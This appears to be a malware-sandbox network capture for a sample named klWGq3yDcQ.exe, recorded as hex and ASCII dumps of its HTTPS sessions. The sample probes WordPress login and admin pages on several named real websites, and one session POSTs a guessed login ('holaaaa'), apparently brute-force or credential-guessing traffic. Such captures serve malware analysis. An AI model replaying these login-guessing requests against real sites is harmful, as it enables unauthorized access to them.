                                                                                                                                                                                                    2023-11-26 06:00:05 UTC16384INData Raw: 37 66 65 30 0d 0a 0a 09 09 09 0a 09 09 0a 09 0a 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 67 65 74 4d 61 63 68 69 6e 65 49 6d 67 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 74 68 65 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 2b 20 22 2f 22 3b 0a 09 09 72 65 74 75 72 6e 20 74 68 65 55 72 6c 20 2b 20 27 2e 2e 2f 2e 2e 2f 61 73 73 65 74 73 2f 61 6d 61 7a 6f 6e 2d 34 32 33 31 2f 74 72 61 63 74 6f 72 2e 70 6e 67 27 3b 0a 09 7d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 09 09 3c 2f 68 65 61 64 65 72 3e 0a 0a 09 09 0a 09 0a 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 20 69 64 3d 22 69 73 45 6e 61 62 6c 65 4d 75 6c 74
                                                                                                                                                                                                    Data Ascii: 7fe0<script>var getMachineImg = function(){var theUrl = 'https://' + location.hostname + "/";return theUrl + '../../assets/amazon-4231/tractor.png';}</script></header><input type="hidden" value="false" id="isEnableMult
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC16360INData Raw: 73 3d 22 66 6f 6f 74 65 72 5f 5f 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 3e 0a 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 2e 63 77 73 2e 64 69 67 69 74 61 6c 2f 66 6f 72 6e 65 63 65 64 6f 72 65 73 2f 66 75 6c 6c 2f 72 65 63 68 2d 61 67 72 69 63 6f 6c 61 31 2e 6a 70 67 22 20 63 6c 61 73 73 3d 22 69 6d 67 2d 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 2f 3e 0a 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6c 6f 67 22 20 3e 0a 09 09 09 09 3c 64 69 76 3e 0a
                                                                                                                                                                                                    Data Ascii: s="footer__logo"><a href="/" itemprop="url"><img src="https://images.cws.digital/fornecedores/full/rech-agricola1.jpg" class="img-logo" alt="Logo"/></a></div></div><div class="container-secondary-blog" ><div>
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC16384INData Raw: 37 66 65 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 70 72 69 63 65 43 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 42 52 4c 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4e 65 77 43 6f 6e 64 69 74 69 6f 6e 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 61 76 61 69 6c 61 62 69 6c 69 74 79 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 53 74 6f 63 6b 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 70 72 69 63 65 22 20 63 6f
                                                                                                                                                                                                    Data Ascii: 7fe0https://www.rech.com/"/><meta itemprop="priceCurrency" content="BRL"/><meta itemprop="itemCondition" content="https://schema.org/NewCondition"/><meta itemprop="availability" content="https://schema.org/InStock"/><meta itemprop="price" co
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC16360INData Raw: 65 73 74 2e 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 74 6f 63 6b 2d 69 64 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 74 6f 63 6b 49 64 7d 7d 22 0a 09 09 09 09 09 09 69 64 3d 22 73 6b 75 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 62 74 6e 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 6c 79 70 68 69 63 6f 6e 20 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 22 3e 3c 2f 73 70 61 6e 3e 41 64 69 63 69 6f 6e 61 72 20 61 6f 20 63 61 72 72 69 6e 68 6f 0a 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 09 0a 0a 09 09 09 09 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 63 61 6c 63 75 6c 61 74 6f 72 20 6d 6f 64 61 6c 20 66
                                                                                                                                                                                                    Data Ascii: est.stockRemaining}}"data-stock-id="{{sku.best.stockId}}"id="sku-add-to-cart-btn"><span class="glyphicon glyphicon-shopping-cart"></span>Adicionar ao carrinho</button></form><div class="modal-calculator modal f
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC3250INData Raw: 63 61 62 0d 0a 0a 09 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 6e 61 6d 65 29 20 7b 0a 20 20 20 20 09 09 09 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 6e 61 6d 65 20 2b 20 27 3d 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 3b 27 3b 0a 09 09 09 7d 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 74 6f 6b 65 6e 27 29 3b 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 73 75 62 64 6f 6d 61 69 6e 27 29 3b 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 74 6f 6b 65 6e 2d 77 73 27 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09
                                                                                                                                                                                                    Data Ascii: cab<script type="text/javascript">function deleteCookie(name) { document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';}deleteCookie('token');deleteCookie('subdomain');deleteCookie('token-ws');</script>
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    611192.168.2.457406144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC492INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC7700INData Raw: 32 38 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 28bc<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC2734INData Raw: 64 6f 6d 61 69 6e 20 29 3b 0a 7d 20 29 28 20 22 64 65 66 61 75 6c 74 22 2c 20 7b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 2d 72 65 76 69 73 69 6f 6e 2d 64 61 74 65 22 3a 22 32 30 32 33 2d 31 31 2d 31 30 20 31 37 3a 31 38 3a 34 37 2b 30 30 30 30 22 2c 22 67 65 6e 65 72 61 74 6f 72 22 3a 22 47 6c 6f 74 50 72 65 73 73 5c 2f 34 2e 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 6c 6f 63 61 6c 65 5f 64 61 74 61 22 3a 7b 22 6d 65 73 73 61 67 65 73 22 3a 7b 22 22 3a 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 70 6c 75 72 61 6c 2d 66 6f 72 6d 73 22 3a 22 6e 70 6c 75 72 61 6c 73 3d 32 3b 20 70 6c 75 72 61 6c 3d 6e 20 21 3d 20 31 3b 22 2c 22 6c 61 6e 67 22 3a 22 65 73 5f 4d 58 22 7d 2c 22 25
                                                                                                                                                                                                    Data Ascii: domain );} )( "default", {"translation-revision-date":"2023-11-10 17:18:47+0000","generator":"GlotPress\/4.0.0-alpha.11","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n != 1;","lang":"es_MX"},"%
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    612192.168.2.45738918.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC158OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:05 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    613192.168.2.457332120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC923OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJLj9sgFIX3%2BRUj740xzmOMkkjppI9IaRJN0i66qa7heoKEwQN42vz7OmaqaSs1LA%2F3Ozr3wNxDo1u%2B6sLZPOJzhz6M7vrzs9HG8%2BFykXTOcAteeW6gQc%2BD4MfV5y1nhPLW2WCF1ck%2F2G0KvEcXlDUR26wXyX73frv%2FuNl9L%2BsCZ6xiMygKEILeU5nXVT6dVZJhIRkUk0kNExnRr%2Bh877NIettkFN2873BjfAATep2yIs3zlE1PdMop5ZR9i%2Bi6X1YZCAN%2BDqH1PMu0fVKGNEo4620drNHKIBG2ycR9PS7KCaY1jDEd5%2BU0BVmVaQVMSCaAljXNrquzaH94beadMlKZp9uFVHHI80%2Bn0yE97I%2BnaLL6XdSDNb5r0B3RvSiBXx63b5mbCxGgX8BdyLOWBGVHoBuiZCJipD23yXJwnF91PnTkljcd5tmfo29wy3d9%2Fs36YLUSl0G%2Fng%2FWNRD%2Bv2ZO8kFRMq2HUd4Z36JQtcLXxxw21tr%2BeHAIARdJcB0md9lyFLP8%2FVGXvwA%3D&RelayState=%2Fwp-login.php
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC399INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 6c 6f 67 69 6e 2f 3f 70 61 67 65 3d 25 32 46
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:05 GMTTransfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: /login/?page=%2F
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    614192.168.2.457447194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC547INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Founddate: Sun, 26 Nov 2023 06:00:05 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; rel="


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    615192.168.2.457481213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC395OUTPOST /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/wp/wp-login.php
                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC138OUTData Raw: 6c 6f 67 3d 68 6f 6c 61 61 61 61 26 70 77 64 3d 68 6f 6c 61 61 61 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 25 32 46 77 70 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=holaaaa&pwd=holaaaa&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fwww.ceuandalucia.es%2Fwp%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:05 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC7437INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    616192.168.2.45780154.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC621INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:06 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Set-Cookie: originDirect=true; Max-Age=60
